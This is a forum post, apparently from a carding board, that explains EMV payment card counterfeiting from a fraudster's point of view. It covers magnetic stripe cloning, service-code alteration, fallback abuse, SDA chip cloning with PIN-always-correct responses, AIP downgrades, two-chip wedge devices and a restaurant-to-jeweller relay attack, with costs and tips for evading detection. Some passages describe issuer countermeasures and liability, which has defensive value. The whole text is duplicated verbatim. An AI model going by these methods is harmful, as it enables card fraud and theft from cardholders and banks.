Teacher
Professional
- Messages
- 2,670
- Reaction score
- 791
- Points
- 113
Let's start with the most common type of fraud - counterfeit cards. It has already been said that dynamic card authentication methods (online and offline) deal a devastating blow to this type of fraud. Without knowing the corresponding key of the card or issuer or system, at the level of cryptographic strength of the RSA algorithm in the case of offline dynamic card authentication and the 3DES algorithm for online authentication, the chip card cannot be counterfeited.
Counterfeit magnetic stripe cards
At the same time, if the cards are incorrectly personalized or a weak authentication method is selected, fraudulent card frauds are possible. Below we will try to systematize the possible ways to counterfeit the card.
So, let's imagine that in our left hand we have a real hybrid card issued by a bank that is a member of some payment system, and in our right hand we have a “blank” blank for a hybrid card or a card with a magnetic stripe. In addition, like any self-respecting fraudster, we have a programmer for the chip used on the card blank, means for personalizing the magnetic stripe of the card, as well as a machine for personalizing plastic (printing, embossing, etc.).
Depending on which card is in our left hand, we will offer various methods of fraudulent card fraud, in which, based on the data of the left hand card, we will have a card in our right hand that, under certain circumstances, can be successfully used in a payment networks.
First of all, we will divide all possible methods of fraud into two classes: fake chip and fake magnetic stripe of the card.
Fake magnetic stripe. Possible schemes for counterfeiting the magnetic stripe of a hybrid card are shown in Fig. 3.
Case 1, option 1. Service code 2xx. In our right hand we have a card with only a magnetic stripe, onto which information has been transferred from the magnetic stripe of the card, located in the left hand. We are trying to use the card in a hybrid terminal that accepts smart cards and magnetic stripe cards. The terminal should check the value of the service code on the magnetic stripe, and if it is 2XX, it should require a transaction using the chip.
The terminal must not allow magnetic stripe operations if the service code value is 2XX and the terminal has not made a decision to enter Fallback mode after attempting to use a chip card to perform the operation. It is necessary to have a clear instruction for the cashier and a clear message on the terminal display that the transaction must be performed using the chip or be rejected.
In some implementations of the terminal application, despite the warnings, the seller still has the opportunity to bypass the rule formulated above and conduct the operation using a magnetic stripe. In this case, the service bank is responsible for possible fraud from the point of view of the payment system.
Despite the fact that the responsibility in this case lies with the servicing bank, the issuer is still recommended to reject transactions in which, in MasterCard terms, the POS data element (DE 061) indicates that the terminal can perform an operation on the chip, but carries out it on the magnetic stripe and at the same time the POS Entry mode (DE022) is not equal to 80X (fallback case), but is, for example, 90X (magnetic stripe) or 05X (chip).
Consider now "Case 1. Option 1. Magnetic terminal". In our right hand we have the same card as in the previous case. In this case, for greater persuasiveness, there may be an additional non-personalized chip on the card. We are trying to use this card in a terminal that only accepts magnetic stripe cards.
If the transaction was authorized by the issuer, fraud will occur, and the following will be responsible for it:
• the servicing bank, if this bank and the issuer of the counterfeit card are located in the zone of the chip liability shift accepted in the payment system;
• issuer - in all other cases.
To protect against fraud, when there is no chip on the counterfeit card, in the event of a card with service code = 2XX, a message should appear on the display of magnetic terminals about the need to check the presence of a chip on the card by the cashier of the merchant. If there is no chip, the cashier must reject accepting the card.
Case 1, option 2. Service code 1xx. The data of the first and second tracks of the hybrid credit card is copied to the card with magnetic stripe only, with a change in the value of the service code to 1XX. The card is used offline to perform sub-limit operations (the size of the operation is less than the value (terminal floor limit). Using the card in real time has little chance of success, since changing the service code violates the integrity of the recording of the second track of the magnetic card, and checking the CVV / The CVC will detect this fact at the issuer's processing center, in which case there is every opportunity to successfully use a counterfeit card, regardless of whether the terminal is hybrid or accepts only magnetic stripe cards.
If a counterfeit card is used in a hybrid terminal, the entire responsibility for the fraud lies with the card issuer. This is by far the most serious flaw in the concept of migrating to a chip.
Indeed, both the card and the terminal support the new technology, and yet card counterfeiting is possible without any violations of the rules for accepting the card by the merchant. To avoid this type of fraud, payment systems have introduced a rule according to which all transactions with magnetic stripe cards in terminals that support online operation must be sent for authorization to the issuer.
If a counterfeit card is used in a terminal that only accepts magnetic stripe cards, the fraud is responsible for:
• the servicing bank, if this bank and the issuer of the card that was counterfeited are located in the zone of the accepted liability shift in the payment system;
• issuer - in all other cases.
Case 2. Hybrid card with a "crooked" chip (Fallback initialization to a fake magnetic stripe). A blank hybrid card with a "crooked" (for example, burned or incorrectly personalized) chip is used. In this case, the blank will cost more (about 50 cents), but information copied from the magnetic strip of a real hybrid card can be applied to the magnetic stripe and used in both the magnetic and hybrid terminals.
If a counterfeit card is used in a hybrid terminal, the entire responsibility for the fraud lies with the card issuer.
If the terminal accepts only cards with a magnetic stripe, then the following is responsible for fraud:
• the service bank, if this bank and the issuer of the card that was counterfeited are located in the zone of the liability shift accepted in the payment system;
• issuer - in all other cases.
The only countermeasure to combat this type of fraud is the organization in the issuer's processing center to monitor the number of fallback transactions performed on each issuer's card. If the number of fallback operations for a certain card turned out to be higher than the threshold value, then this is a signal to the issuer to conduct an investigation in order to make sure that the operations were performed by the legitimate cardholder.
Payment systems are also taking measures to restrict the use of the Fallback mode in countries where the level of compliance of terminals and cards with the EMV standard is quite high. In particular, in Europe today this regime has been abandoned when processing ATM transactions. In the near future, today the mandatory requirement to support fallback in POS terminals will become optional and it will be determined at the country level whether or not fallback authorization on the magnetic stripe is mandatory.
Counterfeit Chip Cards
Fake chip. A cloned card is a card issued by an unauthorized person on behalf of an authorized payment system issuer. At the same time, the fact that the card is cloned cannot be determined by the terminal in case of processing the transaction in offline mode.
To clone an SDA card, you just need to have a microprocessor card with a programmer for it and a general knowledge of the EMV standard. As a card, for example, a widely available card with a PIC16F84 microprocessor can be considered.
Then the data from the real SDA-card, including the FCI template, AIP, AFL data and records from the files defined in AFL, are “transferred” to the “clean” microprocessor card. Among the line file data, there is a signed static application data object, which is the critical card data signed by the issuer.
The card supports the SELECT, GET PROCESSING OPTIONS, READ RECORD commands in a standard way. In response to the VERIFY command, the card always responds by confirming that the entered PIN code is correct.
In response to the GENERATE AC command, the card responds as follows:
• if the terminal asks for ARQC or AAC, the card responds with an AAC cryptogram, which is an arbitrary 16-bit hexadecimal number;
• if the terminal asks for TC, the card responds with TC and uses an arbitrary hexadecimal 16-bit number as a cryptogram.
Thus, if the terminal believes that the transaction can be approved offline, the transaction with the cloned card will be approved. In all other cases, the cloned card will insist on rejecting the transaction offline. It follows that the cloned card cannot be blocked by the issuer through the script processing procedure.
The cost of cloning one card is several dollars (you need to purchase blanks and a programmer for the microcircuit chosen for cloning). Real card data required for cloning can be collected at POS terminals in exactly the same way it is collected today for magnetic stripe cards.
Let's note the following. Let's assume the card is cloned from a real card that supports offline dynamic authentication.
In this case, the same data is transferred to the cloned card that is used when cloning the SDA card. Obviously, if such a cloned card is used in a terminal that supports only the SDA method, then it has a 100% chance of success, provided the terminal approves the transaction in offline mode. That is why payment systems made support for the DDA method on POS terminals mandatory (with the exception of "Online Only" terminals, for which support for offline card authentication is optional).
Similarly, if a DDA / CDA card is cloned onto an SDA card and the terminal does not support offline card authentication at all, then if the card does not support a mechanism for verifying the fact of its authentication by the issuer, the terminal may deceive the issuer by claiming to conduct offline dynamic card authentication, in reality without doing it. In this case, the deception on the part of the merchant is not committed with the purpose of fraud, but in order to confirm the fulfillment of the payment system requirement. Fraudsters can take advantage of this deception by successfully using cloned cards in such terminals.
Then another question arises: "Is it possible to clone a DDA / CDA card to a card with static authentication when using the cloned card in a terminal that supports DDA / CDA dynamic authentication methods?" The answer to this question is generally negative, since in order to clone a DDA / CDA card, provided that it is used under the conditions mentioned, it is necessary to know the secret key of the card.
At the same time, in some cases, cloning of a DDA / CDA card is possible. If, for example, a DDA / CDA card directly (via AIP) supports the SDA method and does not support (does not contain in its file structure) an SDA tag list data object, then such a card can be cloned. Indeed, having the open card data at our disposal, it is easy to modify the AIP object on the cloned card, indicating in it that the card only supports the SDA method. In this case, the cloned card will be successfully used for offline processing of the transaction. Note that the modification of the AIP object will pass unnoticed for the terminal, since the AIP object is not included in the list of signed data, the integrity of which is checked as part of the card authentication procedure using the SDA method. We remind the reader,
Note that in order to avoid cloning a DDA card, it is better when such a card does not directly support the SDA method (SDA is indirectly supported during the card key certificate verification process), i.e., in particular, it does not contain a signed static application data object! In this case, even if the card does not contain the SDA tag list element, it is not possible to clone it to the SDA card, since the necessary data (signed static application data) is missing.
It should be noted that the lack of direct support of the SDA method by the card will not affect its prevalence, since all terminals support DDA.
Despite the fact that DDA cards, when properly personalized, cannot be cloned, they do not ensure the integrity of information exchange between the card and the terminal. There are possible attacks called "two-chip attack" and are as follows. A printed circuit board is used that contains two chips: one is a banking chip and the other is an emulator chip. A bank chip is a chip personalized by a bank for a DDA card. The chip emulator controls the exchange of data between the bank's chip and the terminal, modifying the dialogue between the card and the terminal, if necessary. It is this chip that is inserted into the terminal's card reader and exchanges information with the terminal. It analyzes the command data received from the terminal and, if necessary, modifies it in a way beneficial to the fraudster.
Here are the simplest examples of possible data modification. If the terminal in the GENERATE AC command requested the TC cryptogram, and the card represented by the bank chip decides to process the transaction online or reject it offline, the emulator chip changes the unprotected cryptogram information data in such a way that the card responds to the terminal with the TC cryptogram. Thus, the transaction is approved, given that by the decision of the issuer it must either be rejected or transferred to the issuer for authorization.
Another example. The chip emulator, having received the value of the transaction size from the terminal, changes it to a smaller value, at which the card is ready to approve the transaction in offline authorization mode.
Such a chip emulator is called wedge device in the literature. I must say that the wedge device can be implemented not only in the printed circuit of the card, but also on the POS terminal. The main thing is that it acts as an intermediary for information exchange between the card and the terminal.
The problem of ensuring the integrity of information exchange between the card and the terminal is solved by using CDA cards. Such cards maintain the integrity of the most important information circulating between the card and the terminal during transaction processing. Therefore, it is impossible to modify the information exchange in a way that is invisible to the terminal.
In addition, CDA cards show better performance (faster transaction execution time) compared to DDA cards. This is because the INERNAL AUTHENTICATE command is not used for offline card authentication, which reduces the communication between the terminal and the card.
Ensuring the integrity of information exchange with the terminal and higher performance makes CDA cards attractive for contactless payments. In particular, in the MasterCard PayPass standard, only the CDA method is considered as a method of dynamic authentication.
At the same time, CDA cards have a number of weaknesses. First, the module size of the CDA card key may not exceed 205 bytes. Today, this limitation is not onerous, as smaller card keys are mainly used. However, this limitation may become sensitive in the future. Payment systems already distribute their keys of 248 bytes (the maximum key size in accordance with the EMV standard), allowing issuers and cards to use keys of comparable sizes.
Secondly, if the servicing bank (payment system) is inaccurate in managing the loading of the system keys to the terminals, it may happen that the servicing bank did not load (more precisely, did not load on time) any of the system keys on its terminals. In this case, all CDA-cards of issuers whose keys are certified on the system key that is absent in the terminal will simply not be able to be serviced on such a terminal.
Indeed, having received a response from the card to the GENERATE AC command, the terminal will not be able to recover data from signed dynamic application data and will have to reject the transaction. This will happen even if the card, in response to the GENERATE AC command, sends an ARQC cryptogram to the terminal to process the transaction in real time. Without knowing the system key, it is impossible to recover the ARQC cryptogram from the signed dynamic application data object, and the transaction will have to be rejected.
Note that in the case of a DDA card, the transaction could be performed online if the terminal does not have the corresponding system key. The CDA method, in case of failure of card authentication, unlike other authentication methods, deprives it of the opportunity to apply for authorization to the issuer.
Summarizing the above,we list below methods of cloning a hybrid card for its use in offline mode of transaction authorization:
1) if the hybrid card is an SDA card, then it is easily cloned into an SDA card;
2) if we are dealing with a DDA / CDA card that also directly supports the SDA method (there is a signed static application data object on the card), then such a card can be cloned to the SDA card:
• by changing the card profile (application interchange profile object) , which will remain invisible to the terminal, provided that there is no SDA tag list object on it, so that the card profile will indicate that the card only supports the SDA method;
• when using a cloned card in terminals that support, in violation of the rules of payment systems, only the SDA card authentication method or do not support any offline authentication method;
• when using a card issued using a false system key in the terminal, on which the false system key was previously loaded;
3) A DDA card can be "upgraded" by creating a printed circuit board on its basis, which uses, along with the real card's chip, a second simulator chip operating according to a two-chip attack scheme.
Once again, note that chip counterfeiting is practically possible only by cloning it - transferring the data of a real chip to a chip used to produce a fraudulent card. Indeed, in order to change the data on an already personalized chip, you can use two ways: try to do it using the script processing procedure or in the card personalization mode.
In script processing, the PUT DATA and UPDATE RECORD commands are used to modify records and individual data objects. These commands are applied using MAC codes and, if necessary, data encryption. In addition, these commands are most often executed after authentication with the issuer's card.
Therefore, during the execution of the script processing procedure, frauds are possible only when the secret keys of the card / issuer are compromised, which are used to generate a cryptogram and ensure the integrity of data exchange (generation of MAC codes).
The keys used during the personalization phase and in the Script Processing procedure are different.
Forgery of the chip data in the card personalization mode is also possible only as a result of the compromise of the card keys (issuer) of the card manufacturer.
The chip manufacturer assigns a chip serial number to each chip and inserts the card supplier's secret key into the chip, which is derived from the card supplier's key using the chip serial number and key ID as a diversification mod.
Then the card supplier, after the chip is inserted into the plastic card, performs the card pre-personalization procedure. At the beginning of the procedure, the card must authenticate the card supplier using the card's secret key chip previously inserted by the manufacturer and known only to the card and its supplier. Only after successful authentication of the card provider can he perform its pre-personalization.
In terms of card security, the pre-personalization procedure consists in putting keys on the card, which are derived from the secret key of the card issuer and the KEY DATA element, which includes the serial number of the chip and the key identifier of the issuer. These keys are designed to output the session keys of the card used at the stage of its personalization for mutual dynamic authentication of the card and the card personalization machine, as well as to ensure the confidentiality and integrity of data transferred from the personalization machine to the card.
Thus, at the stage of personalization, a separate set of keys is used, which differs from similar keys used when performing a transaction.
It follows from the above that at the stage of card personalization, fraud is possible only if the secret keys of the card (issuer) are compromised.
Recently, information about the scheme of virtual card cloning in real time has appeared in print. The scheme is applicable to any cards (SDA, DDA, CDA), including those supporting secure PIN verification. The idea is that the fraudsters have a terminal controlled by them, located, say, in a restaurant, as well as a card with an application that works on a contact interface (ISO 7816) and a contactless radio interface (a vicinity interface, for example, in accordance with ISO 15 693 , ISO 18000). The purpose of the fraudulent card application is to support data relaying with the real POS terminal and the fraudulent equipment.
The diagram looks like this. A fraudster with a backpack over his shoulder comes, for example, to a jewelry store, chooses a piece of jewelry for 2000 euros and waits for a call from an accomplice in a restaurant. At this time, an unsuspecting restaurant visitor decides to pay with a card for a lunch worth 20 euros. An accomplice with a backpack calls the latter and he goes to the cashier of a jewelry store to pay for the jewelry with his fraudulent card.
Next, the fraudulent card is inserted into the reader of a real POS terminal, and the card starts broadcasting the commands received from the real terminal via the radio interface to the fraudster's equipment located in the backpack. The fraudster's equipment, in turn, redirects these commands to the fraudulent POS terminal, which delivers commands to the card of an unsuspecting restaurant customer. The responses from the restaurant customer card are transmitted to the real terminal of the jewelry store in reverse order. The fraud scheme is shown in Fig. 4.
It is obvious that a fraudulent transaction can be carried out both in real time and offline. Moreover, upon completion of the transaction, the restaurant's customer will receive a receipt with the details of his card for 20 euros. The only problem will be that, in general, the real terminal will print a receipt with the card details of the injured terminal visitor. But here, too, not all is lost. Firstly, not every cashier verifies the receipt data with the data printed (embossed) on the surface of the card. Secondly, there are regulars in the restaurant, whose card details can be applied to a fraudulent card in advance.
Counterfeit magnetic stripe cards
At the same time, if the cards are incorrectly personalized or a weak authentication method is selected, fraudulent card frauds are possible. Below we will try to systematize the possible ways to counterfeit the card.
So, let's imagine that in our left hand we have a real hybrid card issued by a bank that is a member of some payment system, and in our right hand we have a “blank” blank for a hybrid card or a card with a magnetic stripe. In addition, like any self-respecting fraudster, we have a programmer for the chip used on the card blank, means for personalizing the magnetic stripe of the card, as well as a machine for personalizing plastic (printing, embossing, etc.).
Depending on which card is in our left hand, we will offer various methods of fraudulent card fraud, in which, based on the data of the left hand card, we will have a card in our right hand that, under certain circumstances, can be successfully used in a payment networks.
First of all, we will divide all possible methods of fraud into two classes: fake chip and fake magnetic stripe of the card.
Fake magnetic stripe. Possible schemes for counterfeiting the magnetic stripe of a hybrid card are shown in Fig. 3.
Case 1, option 1. Service code 2xx. In our right hand we have a card with only a magnetic stripe, onto which information has been transferred from the magnetic stripe of the card, located in the left hand. We are trying to use the card in a hybrid terminal that accepts smart cards and magnetic stripe cards. The terminal should check the value of the service code on the magnetic stripe, and if it is 2XX, it should require a transaction using the chip.
The terminal must not allow magnetic stripe operations if the service code value is 2XX and the terminal has not made a decision to enter Fallback mode after attempting to use a chip card to perform the operation. It is necessary to have a clear instruction for the cashier and a clear message on the terminal display that the transaction must be performed using the chip or be rejected.
In some implementations of the terminal application, despite the warnings, the seller still has the opportunity to bypass the rule formulated above and conduct the operation using a magnetic stripe. In this case, the service bank is responsible for possible fraud from the point of view of the payment system.
Despite the fact that the responsibility in this case lies with the servicing bank, the issuer is still recommended to reject transactions in which, in MasterCard terms, the POS data element (DE 061) indicates that the terminal can perform an operation on the chip, but carries out it on the magnetic stripe and at the same time the POS Entry mode (DE022) is not equal to 80X (fallback case), but is, for example, 90X (magnetic stripe) or 05X (chip).
Consider now "Case 1. Option 1. Magnetic terminal". In our right hand we have the same card as in the previous case. In this case, for greater persuasiveness, there may be an additional non-personalized chip on the card. We are trying to use this card in a terminal that only accepts magnetic stripe cards.
If the transaction was authorized by the issuer, fraud will occur, and the following will be responsible for it:
• the servicing bank, if this bank and the issuer of the counterfeit card are located in the zone of the chip liability shift accepted in the payment system;
• issuer - in all other cases.
To protect against fraud, when there is no chip on the counterfeit card, in the event of a card with service code = 2XX, a message should appear on the display of magnetic terminals about the need to check the presence of a chip on the card by the cashier of the merchant. If there is no chip, the cashier must reject accepting the card.
Case 1, option 2. Service code 1xx. The data of the first and second tracks of the hybrid credit card is copied to the card with magnetic stripe only, with a change in the value of the service code to 1XX. The card is used offline to perform sub-limit operations (the size of the operation is less than the value (terminal floor limit). Using the card in real time has little chance of success, since changing the service code violates the integrity of the recording of the second track of the magnetic card, and checking the CVV / The CVC will detect this fact at the issuer's processing center, in which case there is every opportunity to successfully use a counterfeit card, regardless of whether the terminal is hybrid or accepts only magnetic stripe cards.
If a counterfeit card is used in a hybrid terminal, the entire responsibility for the fraud lies with the card issuer. This is by far the most serious flaw in the concept of migrating to a chip.
Indeed, both the card and the terminal support the new technology, and yet card counterfeiting is possible without any violations of the rules for accepting the card by the merchant. To avoid this type of fraud, payment systems have introduced a rule according to which all transactions with magnetic stripe cards in terminals that support online operation must be sent for authorization to the issuer.
If a counterfeit card is used in a terminal that only accepts magnetic stripe cards, the fraud is responsible for:
• the servicing bank, if this bank and the issuer of the card that was counterfeited are located in the zone of the accepted liability shift in the payment system;
• issuer - in all other cases.
Case 2. Hybrid card with a "crooked" chip (Fallback initialization to a fake magnetic stripe). A blank hybrid card with a "crooked" (for example, burned or incorrectly personalized) chip is used. In this case, the blank will cost more (about 50 cents), but information copied from the magnetic strip of a real hybrid card can be applied to the magnetic stripe and used in both the magnetic and hybrid terminals.
If a counterfeit card is used in a hybrid terminal, the entire responsibility for the fraud lies with the card issuer.
If the terminal accepts only cards with a magnetic stripe, then the following is responsible for fraud:
• the service bank, if this bank and the issuer of the card that was counterfeited are located in the zone of the liability shift accepted in the payment system;
• issuer - in all other cases.
The only countermeasure to combat this type of fraud is the organization in the issuer's processing center to monitor the number of fallback transactions performed on each issuer's card. If the number of fallback operations for a certain card turned out to be higher than the threshold value, then this is a signal to the issuer to conduct an investigation in order to make sure that the operations were performed by the legitimate cardholder.
Payment systems are also taking measures to restrict the use of the Fallback mode in countries where the level of compliance of terminals and cards with the EMV standard is quite high. In particular, in Europe today this regime has been abandoned when processing ATM transactions. In the near future, today the mandatory requirement to support fallback in POS terminals will become optional and it will be determined at the country level whether or not fallback authorization on the magnetic stripe is mandatory.
Counterfeit Chip Cards
Fake chip. A cloned card is a card issued by an unauthorized person on behalf of an authorized payment system issuer. At the same time, the fact that the card is cloned cannot be determined by the terminal in case of processing the transaction in offline mode.
To clone an SDA card, you just need to have a microprocessor card with a programmer for it and a general knowledge of the EMV standard. As a card, for example, a widely available card with a PIC16F84 microprocessor can be considered.
Then the data from the real SDA-card, including the FCI template, AIP, AFL data and records from the files defined in AFL, are “transferred” to the “clean” microprocessor card. Among the line file data, there is a signed static application data object, which is the critical card data signed by the issuer.
The card supports the SELECT, GET PROCESSING OPTIONS, READ RECORD commands in a standard way. In response to the VERIFY command, the card always responds by confirming that the entered PIN code is correct.
In response to the GENERATE AC command, the card responds as follows:
• if the terminal asks for ARQC or AAC, the card responds with an AAC cryptogram, which is an arbitrary 16-bit hexadecimal number;
• if the terminal asks for TC, the card responds with TC and uses an arbitrary hexadecimal 16-bit number as a cryptogram.
Thus, if the terminal believes that the transaction can be approved offline, the transaction with the cloned card will be approved. In all other cases, the cloned card will insist on rejecting the transaction offline. It follows that the cloned card cannot be blocked by the issuer through the script processing procedure.
The cost of cloning one card is several dollars (you need to purchase blanks and a programmer for the microcircuit chosen for cloning). Real card data required for cloning can be collected at POS terminals in exactly the same way it is collected today for magnetic stripe cards.
Let's note the following. Let's assume the card is cloned from a real card that supports offline dynamic authentication.
In this case, the same data is transferred to the cloned card that is used when cloning the SDA card. Obviously, if such a cloned card is used in a terminal that supports only the SDA method, then it has a 100% chance of success, provided the terminal approves the transaction in offline mode. That is why payment systems made support for the DDA method on POS terminals mandatory (with the exception of "Online Only" terminals, for which support for offline card authentication is optional).
Similarly, if a DDA / CDA card is cloned onto an SDA card and the terminal does not support offline card authentication at all, then if the card does not support a mechanism for verifying the fact of its authentication by the issuer, the terminal may deceive the issuer by claiming to conduct offline dynamic card authentication, in reality without doing it. In this case, the deception on the part of the merchant is not committed with the purpose of fraud, but in order to confirm the fulfillment of the payment system requirement. Fraudsters can take advantage of this deception by successfully using cloned cards in such terminals.
Then another question arises: "Is it possible to clone a DDA / CDA card to a card with static authentication when using the cloned card in a terminal that supports DDA / CDA dynamic authentication methods?" The answer to this question is generally negative, since in order to clone a DDA / CDA card, provided that it is used under the conditions mentioned, it is necessary to know the secret key of the card.
At the same time, in some cases, cloning of a DDA / CDA card is possible. If, for example, a DDA / CDA card directly (via AIP) supports the SDA method and does not support (does not contain in its file structure) an SDA tag list data object, then such a card can be cloned. Indeed, having the open card data at our disposal, it is easy to modify the AIP object on the cloned card, indicating in it that the card only supports the SDA method. In this case, the cloned card will be successfully used for offline processing of the transaction. Note that the modification of the AIP object will pass unnoticed for the terminal, since the AIP object is not included in the list of signed data, the integrity of which is checked as part of the card authentication procedure using the SDA method. We remind the reader,
Note that in order to avoid cloning a DDA card, it is better when such a card does not directly support the SDA method (SDA is indirectly supported during the card key certificate verification process), i.e., in particular, it does not contain a signed static application data object! In this case, even if the card does not contain the SDA tag list element, it is not possible to clone it to the SDA card, since the necessary data (signed static application data) is missing.
It should be noted that the lack of direct support of the SDA method by the card will not affect its prevalence, since all terminals support DDA.
Despite the fact that DDA cards, when properly personalized, cannot be cloned, they do not ensure the integrity of information exchange between the card and the terminal. There are possible attacks called "two-chip attack" and are as follows. A printed circuit board is used that contains two chips: one is a banking chip and the other is an emulator chip. A bank chip is a chip personalized by a bank for a DDA card. The chip emulator controls the exchange of data between the bank's chip and the terminal, modifying the dialogue between the card and the terminal, if necessary. It is this chip that is inserted into the terminal's card reader and exchanges information with the terminal. It analyzes the command data received from the terminal and, if necessary, modifies it in a way beneficial to the fraudster.
Here are the simplest examples of possible data modification. If the terminal in the GENERATE AC command requested the TC cryptogram, and the card represented by the bank chip decides to process the transaction online or reject it offline, the emulator chip changes the unprotected cryptogram information data in such a way that the card responds to the terminal with the TC cryptogram. Thus, the transaction is approved, given that by the decision of the issuer it must either be rejected or transferred to the issuer for authorization.
Another example. The chip emulator, having received the value of the transaction size from the terminal, changes it to a smaller value, at which the card is ready to approve the transaction in offline authorization mode.
Such a chip emulator is called wedge device in the literature. I must say that the wedge device can be implemented not only in the printed circuit of the card, but also on the POS terminal. The main thing is that it acts as an intermediary for information exchange between the card and the terminal.
The problem of ensuring the integrity of information exchange between the card and the terminal is solved by using CDA cards. Such cards maintain the integrity of the most important information circulating between the card and the terminal during transaction processing. Therefore, it is impossible to modify the information exchange in a way that is invisible to the terminal.
In addition, CDA cards show better performance (faster transaction execution time) compared to DDA cards. This is because the INERNAL AUTHENTICATE command is not used for offline card authentication, which reduces the communication between the terminal and the card.
Ensuring the integrity of information exchange with the terminal and higher performance makes CDA cards attractive for contactless payments. In particular, in the MasterCard PayPass standard, only the CDA method is considered as a method of dynamic authentication.
At the same time, CDA cards have a number of weaknesses. First, the module size of the CDA card key may not exceed 205 bytes. Today, this limitation is not onerous, as smaller card keys are mainly used. However, this limitation may become sensitive in the future. Payment systems already distribute their keys of 248 bytes (the maximum key size in accordance with the EMV standard), allowing issuers and cards to use keys of comparable sizes.
Secondly, if the servicing bank (payment system) is inaccurate in managing the loading of the system keys to the terminals, it may happen that the servicing bank did not load (more precisely, did not load on time) any of the system keys on its terminals. In this case, all CDA-cards of issuers whose keys are certified on the system key that is absent in the terminal will simply not be able to be serviced on such a terminal.
Indeed, having received a response from the card to the GENERATE AC command, the terminal will not be able to recover data from signed dynamic application data and will have to reject the transaction. This will happen even if the card, in response to the GENERATE AC command, sends an ARQC cryptogram to the terminal to process the transaction in real time. Without knowing the system key, it is impossible to recover the ARQC cryptogram from the signed dynamic application data object, and the transaction will have to be rejected.
Note that in the case of a DDA card, the transaction could be performed online if the terminal does not have the corresponding system key. The CDA method, in case of failure of card authentication, unlike other authentication methods, deprives it of the opportunity to apply for authorization to the issuer.
Summarizing the above,we list below methods of cloning a hybrid card for its use in offline mode of transaction authorization:
1) if the hybrid card is an SDA card, then it is easily cloned into an SDA card;
2) if we are dealing with a DDA / CDA card that also directly supports the SDA method (there is a signed static application data object on the card), then such a card can be cloned to the SDA card:
• by changing the card profile (application interchange profile object) , which will remain invisible to the terminal, provided that there is no SDA tag list object on it, so that the card profile will indicate that the card only supports the SDA method;
• when using a cloned card in terminals that support, in violation of the rules of payment systems, only the SDA card authentication method or do not support any offline authentication method;
• when using a card issued using a false system key in the terminal, on which the false system key was previously loaded;
3) A DDA card can be "upgraded" by creating a printed circuit board on its basis, which uses, along with the real card's chip, a second simulator chip operating according to a two-chip attack scheme.
Once again, note that chip counterfeiting is practically possible only by cloning it - transferring the data of a real chip to a chip used to produce a fraudulent card. Indeed, in order to change the data on an already personalized chip, you can use two ways: try to do it using the script processing procedure or in the card personalization mode.
In script processing, the PUT DATA and UPDATE RECORD commands are used to modify records and individual data objects. These commands are applied using MAC codes and, if necessary, data encryption. In addition, these commands are most often executed after authentication with the issuer's card.
Therefore, during the execution of the script processing procedure, frauds are possible only when the secret keys of the card / issuer are compromised, which are used to generate a cryptogram and ensure the integrity of data exchange (generation of MAC codes).
The keys used during the personalization phase and in the Script Processing procedure are different.
Forgery of the chip data in the card personalization mode is also possible only as a result of the compromise of the card keys (issuer) of the card manufacturer.
The chip manufacturer assigns a chip serial number to each chip and inserts the card supplier's secret key into the chip, which is derived from the card supplier's key using the chip serial number and key ID as a diversification mod.
Then the card supplier, after the chip is inserted into the plastic card, performs the card pre-personalization procedure. At the beginning of the procedure, the card must authenticate the card supplier using the card's secret key chip previously inserted by the manufacturer and known only to the card and its supplier. Only after successful authentication of the card provider can he perform its pre-personalization.
In terms of card security, the pre-personalization procedure consists in putting keys on the card, which are derived from the secret key of the card issuer and the KEY DATA element, which includes the serial number of the chip and the key identifier of the issuer. These keys are designed to output the session keys of the card used at the stage of its personalization for mutual dynamic authentication of the card and the card personalization machine, as well as to ensure the confidentiality and integrity of data transferred from the personalization machine to the card.
Thus, at the stage of personalization, a separate set of keys is used, which differs from similar keys used when performing a transaction.
It follows from the above that at the stage of card personalization, fraud is possible only if the secret keys of the card (issuer) are compromised.
Recently, information about the scheme of virtual card cloning in real time has appeared in print. The scheme is applicable to any cards (SDA, DDA, CDA), including those supporting secure PIN verification. The idea is that the fraudsters have a terminal controlled by them, located, say, in a restaurant, as well as a card with an application that works on a contact interface (ISO 7816) and a contactless radio interface (a vicinity interface, for example, in accordance with ISO 15 693 , ISO 18000). The purpose of the fraudulent card application is to support data relaying with the real POS terminal and the fraudulent equipment.
The diagram looks like this. A fraudster with a backpack over his shoulder comes, for example, to a jewelry store, chooses a piece of jewelry for 2000 euros and waits for a call from an accomplice in a restaurant. At this time, an unsuspecting restaurant visitor decides to pay with a card for a lunch worth 20 euros. An accomplice with a backpack calls the latter and he goes to the cashier of a jewelry store to pay for the jewelry with his fraudulent card.
Next, the fraudulent card is inserted into the reader of a real POS terminal, and the card starts broadcasting the commands received from the real terminal via the radio interface to the fraudster's equipment located in the backpack. The fraudster's equipment, in turn, redirects these commands to the fraudulent POS terminal, which delivers commands to the card of an unsuspecting restaurant customer. The responses from the restaurant customer card are transmitted to the real terminal of the jewelry store in reverse order. The fraud scheme is shown in Fig. 4.
It is obvious that a fraudulent transaction can be carried out both in real time and offline. Moreover, upon completion of the transaction, the restaurant's customer will receive a receipt with the details of his card for 20 euros. The only problem will be that, in general, the real terminal will print a receipt with the card details of the injured terminal visitor. But here, too, not all is lost. Firstly, not every cashier verifies the receipt data with the data printed (embossed) on the surface of the card. Secondly, there are regulars in the restaurant, whose card details can be applied to a fraudulent card in advance.
